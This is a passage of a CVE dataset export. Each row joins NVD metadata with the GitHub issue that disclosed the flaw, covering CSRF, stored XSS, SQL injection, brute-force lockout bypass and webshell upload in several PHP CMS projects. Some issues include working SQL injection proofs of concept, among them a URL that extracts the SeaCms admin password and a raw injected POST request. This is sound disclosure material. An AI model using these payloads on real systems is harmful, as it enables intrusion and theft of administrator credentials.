cve_id
stringlengths
13
16
cve_published
stringdate
2019-01-01 16:29:00
2025-02-25 20:15:37
cve_descriptions
stringlengths
34
2.6k
cve_metrics
dict
cve_references
listlengths
1
281
cve_configurations
listlengths
1
70
cve_cwe_list
listlengths
1
1
cve_primary_cwe
stringclasses
164 values
url
stringlengths
36
97
cve_tags
listlengths
1
5
domain
stringclasses
1 value
issue_owner_repo
listlengths
2
2
issue_body
stringlengths
0
198k
issue_title
stringlengths
1
335
issue_comments_url
stringlengths
55
116
issue_comments_count
int64
0
338
issue_created_at
stringdate
2012-06-06 09:34:24
2025-04-02 09:37:20
issue_updated_at
stringdate
2014-04-01 20:16:21
2025-06-16 12:26:58
issue_html_url
stringlengths
36
97
issue_github_id
int64
4.93M
2.97B
issue_number
int64
1
199k
__index_level_0__
int64
0
6.55k
CVE-2022-44389
2022-11-14T20:15:18.593
EyouCMS V1.5.9-UTF8-SP1 was discovered to contain a Cross-Site Request Forgery (CSRF) via the Edit Admin Profile module. This vulnerability allows attackers to arbitrarily change Administrator account information.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/30" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/30" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.5.9:*:*:*:*:*:*:*", "matchCriteriaId": "42A15197-E862-429C-8ECB-79D0B850C9C5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "352" ]
352
https://github.com/weng-xianhu/eyoucms/issues/30
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "weng-xianhu", "eyoucms" ]
EyouCMS v1.5.9 has a vulnerability, Cross-site request forgery(CSRF).Located in the background, edit the administrator profile. This vulnerability may cause the modification of personal information such as administrator password, mobile phone number, and email address. To exploit this vulnerability, a constructed HTML file needs to be opened. 1、Go to the back office - > personal information ![图片1](https://user-images.githubusercontent.com/83074322/198805600-647f7444-43de-4f24-bc6f-d5bbb9b2b3df.png) ![图片2](https://user-images.githubusercontent.com/83074322/198805663-e2201462-1adb-41f1-9af4-33972ad314f0.png) The password is “admin123456” 2、Construct a request package to change passwords, mobile phone numbers, email addresses, and other basic information. ![图片3](https://user-images.githubusercontent.com/83074322/198806546-09371725-758a-44a7-afa9-17a6b092a35b.png) The above figure shows the constructed web page code, using CSRF to change its password to "csrftest", the mobile phone number to "11111111111", and the email address to "123@csrf.test". 3、View the administrator's profile: ![图片4](https://user-images.githubusercontent.com/83074322/198807952-63991501-10fc-4b47-a14c-e24f9e95ada8.png) At this time, the administrator password is "admin123456", and other information is shown in the preceding figure. 4、Click on the constructed web page. ![图片5](https://user-images.githubusercontent.com/83074322/198812728-5c5a42e8-4c83-4632-9b69-8534d8acb298.png) Return to the backend page to view the administrator's profile. ![图片6](https://user-images.githubusercontent.com/83074322/198812752-d48e6cbe-c768-460c-a7eb-faebbb5da159.png) Successfully used CSRF to modify mobile phone number and email address. Verify that the password is changed to "csrftest": ![图片7](https://user-images.githubusercontent.com/83074322/198812781-b7d005c9-1fdd-4a1e-aac0-e9ef3dec2045.png) ![图片8](https://user-images.githubusercontent.com/83074322/198812786-834bf889-e7e4-47b8-8633-84a6314ef1ae.png) Login successful!
EyouCMS v1.5.9 has a vulnerability, Cross-site request forgery(CSRF)
https://api.github.com/repos/weng-xianhu/eyoucms/issues/30/comments
1
2022-10-29T03:58:24Z
2023-02-21T02:49:11Z
https://github.com/weng-xianhu/eyoucms/issues/30
1,428,062,999
30
4,387
CVE-2022-44390
2022-11-14T20:15:18.950
A cross-site scripting (XSS) vulnerability in EyouCMS V1.5.9-UTF8-SP1 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Public Security Record Number text field.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/31" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/31" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.5.9:*:*:*:*:*:*:*", "matchCriteriaId": "42A15197-E862-429C-8ECB-79D0B850C9C5", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/weng-xianhu/eyoucms/issues/31
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "weng-xianhu", "eyoucms" ]
Version:V1.5.9-UTF8-SP1 ![图片1](https://user-images.githubusercontent.com/83074322/198816360-bae5d187-3aeb-4d61-be73-3c1d333fde57.png) 1、Go to the background --> basic information--> the record number and public security record number, and click the code mode to modify to the code mode. ![图片2](https://user-images.githubusercontent.com/83074322/198816384-f76ee49d-6d3b-4fec-bf08-84d4fc218268.png) 2、Construct the JS script at the record number. ![图片3](https://user-images.githubusercontent.com/83074322/198816435-293df216-7c2a-4538-a113-e2607ac4d7d9.png) 3、Open the EyouCMS client. ![图片4](https://user-images.githubusercontent.com/83074322/198816453-811714f6-a955-42cc-b4b2-032263d84b6c.png) 4、Construct JS scripts on the PC side of the computer under the third-party code of the website. ![图片5](https://user-images.githubusercontent.com/83074322/198816477-b262a20d-155f-4d4d-b089-861b244d1fd1.png) 5、Open the EyouCMS client. ![图片6](https://user-images.githubusercontent.com/83074322/198816487-e75cc6a6-e410-49c5-b858-0dcc3d7700d5.png) 6、Cross-site scripting attacks (XSS) also exist on mobile phones under the public security record number and third-party code of the website and Copyright Information.And the javascript in the copyright information will affect both the foreground and the administrator background. ![图片7](https://user-images.githubusercontent.com/83074322/198827435-e450493d-a055-4224-bfe3-6bb5006d6fcb.png)
EyouCMS v1.5.9 has multiple vulnerabilities, stored cross-site scripting (XSS)
https://api.github.com/repos/weng-xianhu/eyoucms/issues/31/comments
1
2022-10-29T06:04:09Z
2023-02-21T01:49:51Z
https://github.com/weng-xianhu/eyoucms/issues/31
1,428,108,510
31
4,388
CVE-2022-3997
2022-11-15T17:15:10.317
A vulnerability, which was classified as critical, has been found in MonikaBrzica scm. Affected by this issue is some unknown functionality of the file upis_u_bazu.php. The manipulation of the argument email/lozinka/ime/id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-213698 is the identifier assigned to this vulnerability.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/MonikaBrzica/scm/issues/2" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.213698" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/MonikaBrzica/scm/issues/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.213698" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:scm_project:scm:-:*:*:*:*:*:*:*", "matchCriteriaId": "3B1A4B9C-BE8D-4C83-A9BD-C5D93CE61DCE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "707" ]
707
https://github.com/MonikaBrzica/scm/issues/2
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "MonikaBrzica", "scm" ]
Open source software scm has a storage type cross site script attack vulnerability Build environment: Aapche2.4.39; MySQL5.7.26; PHP7.3.4 In uredi_ Korisnika.php file, line 42 - line 50, ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/xssdaima.png) The information entered by the user is directly requested by post without filtering upis_ u_ bazu.php ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/xsshouduandaima.png) The parameters of the post request are assigned to the corresponding variables from line 136 to line 141, and then the information is brought into the database for update. The updated data is stored in the database, causing a storage XSS vulnerability Enter the xss code in the input box ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/wytcace1.png) Then the javascript code executes ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1115tc.png)
Open source software scm has a storage type cross site script attack vulnerability
https://api.github.com/repos/MonikaBrzica/scm/issues/2/comments
0
2022-11-15T06:40:48Z
2022-11-15T13:07:37Z
https://github.com/MonikaBrzica/scm/issues/2
1,449,251,439
2
4,389
CVE-2022-3998
2022-11-15T17:15:11.177
A vulnerability, which was classified as critical, was found in MonikaBrzica scm. This affects an unknown part of the file uredi_korisnika.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-213699.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/MonikaBrzica/scm/issues/1" }, { "source": "cna@vuldb.com", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?id.213699" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/MonikaBrzica/scm/issues/1" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Permissions Required", "Third Party Advisory" ], "url": "https://vuldb.com/?id.213699" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:scm_project:scm:-:*:*:*:*:*:*:*", "matchCriteriaId": "3B1A4B9C-BE8D-4C83-A9BD-C5D93CE61DCE", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "707" ]
707
https://github.com/MonikaBrzica/scm/issues/1
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "MonikaBrzica", "scm" ]
Build environment: Aapche2.4.39; MySQL5.7.26; PHP7.3.4 From line 22 to line 29, $id gets the get data and then brings it into the database for query $result returns the database connection results and data query results ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1115daimashenji.png) - We can use sqlmap to validate ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1115sqlmap.png) - Manual SQL injection proof ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1115zhuru.png) POC: ```html http://127.0.0.1/uredi_korisnika.php?id=1 or (select 1174 from(select count(*),concat((select user()),floor(rand(0)*2))x from information_schema.tables group by x)a) ```
SQL injection vulnerability exists in scm
https://api.github.com/repos/MonikaBrzica/scm/issues/1/comments
0
2022-11-15T06:06:10Z
2022-11-15T13:07:21Z
https://github.com/MonikaBrzica/scm/issues/1
1,449,221,157
1
4,390
CVE-2022-4006
2022-11-15T22:15:19.167
A vulnerability, which was classified as problematic, has been found in WBCE CMS. Affected by this issue is the function increase_attempts of the file wbce/framework/class.login.php of the component Header Handler. The manipulation of the argument X-Forwarded-For leads to improper restriction of excessive authentication attempts. The attack may be launched remotely. The name of the patch is d394ba39a7bfeb31eda797b6195fd90ef74b2e75. It is recommended to apply a patch to fix this issue. The identifier of this vulnerability is VDB-213716.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.7, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 2.2, "impactScore": 1.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/WBCE/WBCE_CMS/issues/524" }, { "source": "cna@vuldb.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/wbce/wbce_cms/commit/d394ba39a7bfeb31eda797b6195fd90ef74b2e75" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.213716" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/WBCE/WBCE_CMS/issues/524" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/wbce/wbce_cms/commit/d394ba39a7bfeb31eda797b6195fd90ef74b2e75" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.213716" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:wbce:wbce_cms:-:*:*:*:*:*:*:*", "matchCriteriaId": "0F44EFA8-B748-450F-A765-E455F227D1E9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "307" ]
307
https://github.com/WBCE/WBCE_CMS/issues/524
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "WBCE", "WBCE_CMS" ]
Hi team, I found a way to bypass account protection (not blocked when brute-force account). Step: *this is demo some cases 1. If I log in wrongly too many times, it will be locked ![image](https://user-images.githubusercontent.com/70020521/200104280-6124bd02-b0e1-457e-9797-aa721b421da5.png) 2. But i can pass it by insert X-Forwarded-For header, then brute-force without being locked (use intruder plugin of burp suite) ![image](https://user-images.githubusercontent.com/70020521/200104617-cd1fb003-9cbf-432f-80df-da38d92c914d.png) 3. set payload to brute-force and start attack ![image](https://user-images.githubusercontent.com/70020521/200104745-c4f30bc2-bf80-4c00-a8d8-cac5d73cf65b.png) ![image](https://user-images.githubusercontent.com/70020521/200104753-87d90ff6-4a0b-4f5e-962f-b5f32b9187ae.png) 4. Result find user (bypass account protection without blocked) ![image](https://user-images.githubusercontent.com/70020521/200104986-62abf4b4-6816-4846-8710-410ff572f081.png)
Bypass account protection
https://api.github.com/repos/WBCE/WBCE_CMS/issues/524/comments
1
2022-11-05T06:01:36Z
2022-12-03T09:19:58Z
https://github.com/WBCE/WBCE_CMS/issues/524
1,436,858,984
524
4,391
CVE-2022-4015
2022-11-16T08:15:28.723
A vulnerability, which was classified as critical, was found in Sports Club Management System 119. This affects an unknown part of the file admin/make_payments.php. The manipulation of the argument m_id/plan leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-213789 was assigned to this vulnerability.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 4.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 3.4, "source": "cna@vuldb.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cna@vuldb.com", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/shreyansh225/Sports-Club-Management-System/issues/6" }, { "source": "cna@vuldb.com", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.213789" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/shreyansh225/Sports-Club-Management-System/issues/6" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://vuldb.com/?id.213789" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:sports_club_management_system_project:sports_club_management_system:119:*:*:*:*:*:*:*", "matchCriteriaId": "0629AEBA-BFEA-4404-ACC2-3B21BBB0E1CF", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/shreyansh225/Sports-Club-Management-System/issues/6
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "shreyansh225", "Sports-Club-Management-System" ]
## Build environment: Aapche2.4.39; MySQL5.5.29; PHP5.6.9 SQL injection vulnerability in Sports Club Management System In admin/make_ Payments.php, at line 119, the information entered by the user is submitted to submit_ Payments.php, follow up the code, and we can see that the m entered by the user_ The ID is assigned to $memID. Without any filtering, it is directly inserted into the database for query, and the query results are returned, causing SQL injection vulnerabilities ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/1116daima.png) ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/sportshouduan.png) * Manual verification ![](https://huc-1259038394.cos.ap-chengdu.myqcloud.com/picture/shougongyanzheng15.png) POC: ```html POST /dashboard/admin/submit_payments.php HTTP/1.1 Host: sportsvul.test Content-Length: 213 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://sportsvul.test Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://sportsvul.test/dashboard/admin/make_payments.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=ogqe8040ok4a08i16t97ng7734 Connection: close m_id=1529336794' and (select 2*(if((select * from (select concat((select user())))s), 8446744073709551610, 8446744073709551610)))-- &u_name=Christiana+Mayberry&prevPlan=Football+Plan&plan=BOQKJB&submit=ADD+PAYMENT ```
SQL injection vulnerability in Sports Club Management System
https://api.github.com/repos/shreyansh225/Sports-Club-Management-System/issues/6/comments
0
2022-11-16T07:12:28Z
2022-11-16T08:52:26Z
https://github.com/shreyansh225/Sports-Club-Management-System/issues/6
1,451,010,170
6
4,392
CVE-2022-43234
2022-11-16T15:15:15.753
An arbitrary file upload vulnerability in the /attachments component of Hoosk v1.8 allows attackers to execute arbitrary code via a crafted PHP file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/havok89/Hoosk/issues/64" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/havok89/Hoosk/issues/64" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:hoosk:hoosk:1.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "82154F24-2E08-490F-8040-1E8D19AD554C", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/havok89/Hoosk/issues/64
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "havok89", "Hoosk" ]
Vulnerability exists in **/attachments** routing After logging in to the background, there is an interface for uploading arbitrary files. You can upload php files by building network packages to obtain webshell ![image-20221011101029899](https://user-images.githubusercontent.com/111478995/194982522-d7985fef-4158-4e8e-88dc-ba98e53094d4.png) ![image-20221011101052588](https://user-images.githubusercontent.com/111478995/194982534-4c87615c-1a42-47b9-bdb9-3d4684354400.png)
Hoosk v1.8 has an arbitrary file upload vulnerability
https://api.github.com/repos/havok89/Hoosk/issues/64/comments
0
2022-10-11T02:22:44Z
2022-10-11T02:22:44Z
https://github.com/havok89/Hoosk/issues/64
1,403,907,450
64
4,393
CVE-2022-43256
2022-11-16T15:15:16.217
SeaCms before v12.6 was discovered to contain a SQL injection vulnerability via the component /js/player/dmplayer/dmku/index.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/seacms-com/seacms/issues/23" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/seacms-com/seacms/issues/23" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:seacms:seacms:*:*:*:*:*:*:*:*", "matchCriteriaId": "57289177-BE06-4AA9-8D12-19768013A782", "versionEndExcluding": "12.6", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/seacms-com/seacms/issues/23
[ "Exploit", "Third Party Advisory" ]
github.com
[ "seacms-com", "seacms" ]
There is no verification permission for this file http://xxx.com/js/player/dmplayer/dmku/index.php <img width="1367" alt="image" src="https://user-images.githubusercontent.com/69907847/194710224-afaba353-7c99-445a-ba71-fca0d49646e2.png"> In line 50, "ac" is passed in through the GET method, the value of ac is "so", and the logic judgment is entered. The parameter key is passed into the function without any filtering: 搜索弹幕 <img width="807" alt="image" src="https://user-images.githubusercontent.com/69907847/194710336-07976769-4a02-4729-9f66-8957e5312efd.png"> In the function "搜索弹幕", the parameter key is also brought into the "搜索_弹幕池" without any filtering. <img width="948" alt="image" src="https://user-images.githubusercontent.com/69907847/194710499-88232773-aa77-4b2b-9a3f-870014972be4.png"> In the function "搜索_弹幕池", the key is directly spliced ​​into the SQL query statement and causes sql injection. <img width="1175" alt="image" src="https://user-images.githubusercontent.com/69907847/194710552-1208f4e2-f7ef-4735-8902-b34471091cb8.png"> poc: http://xxx.com/js/player/dmplayer/dmku/index.php?ac=so&key=1%27%20union%20select%20null,null,null,null,null,name,null,null,null,password%20from%20sea_admin%20where%20id=1--%20- <img width="1298" alt="image" src="https://user-images.githubusercontent.com/69907847/194710994-38bf9856-2674-4641-b104-afd57330b5c8.png"> Sqlmap: <img width="1491" alt="image" src="https://user-images.githubusercontent.com/69907847/194711074-211a9e95-5051-4d3b-9263-9e33c3e9c814.png">
SeaCms <= v12.6 /js/player/dmplayer/dmku/index.php has Unauthorized Sql Injection
https://api.github.com/repos/HuaQiPro/seacms/issues/23/comments
0
2022-10-08T13:58:45Z
2022-10-08T13:58:45Z
https://github.com/HuaQiPro/seacms/issues/23
1,401,955,966
23
4,394
CVE-2022-44069
2022-11-16T16:15:10.343
Zenario CMS 9.3.57186 is vulnerable to Cross Site Scripting (XSS) via the Nest library module.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "LOW", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.3, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hieuminhnv/Zenario-CMS-last-version/issues/4" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/hieuminhnv/Zenario-CMS-last-version/issues/4" } ]
